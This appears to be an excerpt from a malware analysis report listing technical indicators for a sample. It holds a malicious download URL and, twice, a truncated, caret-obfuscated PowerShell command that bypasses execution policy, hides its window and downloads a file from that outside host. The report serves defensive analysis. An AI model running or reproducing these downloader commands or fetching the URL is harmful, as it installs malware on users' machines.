Technical Information
- http://mondayhelthc.top/read.php?f=404 as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^we^r^SHELL.eX^e -ExEc^uTI^ONpOL^Icy^ b^yp^A^sS -^nopR^o^fIle ^-W^In^DowS^TYl^e ^H^iD^den^ ^(NEW-^ObjECT sYStE^M.net^.wEb^C^lien^T).downL^O^a^DFi^lE('http://mondayhelthc.t...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "P^O^we^r^SHELL.eX^e -ExEc^uTI^ONpOL^Icy^ b^yp^A^sS -^nopR^o^fIle ^-W^In^DowS^TYl^e ^H^iD^den^ ^(NEW-^ObjECT sYStE^M.net^.wEb^C^lien^T).downL^O^a^DFi^lE('http://mondayhelthc.t...' (with hidden window)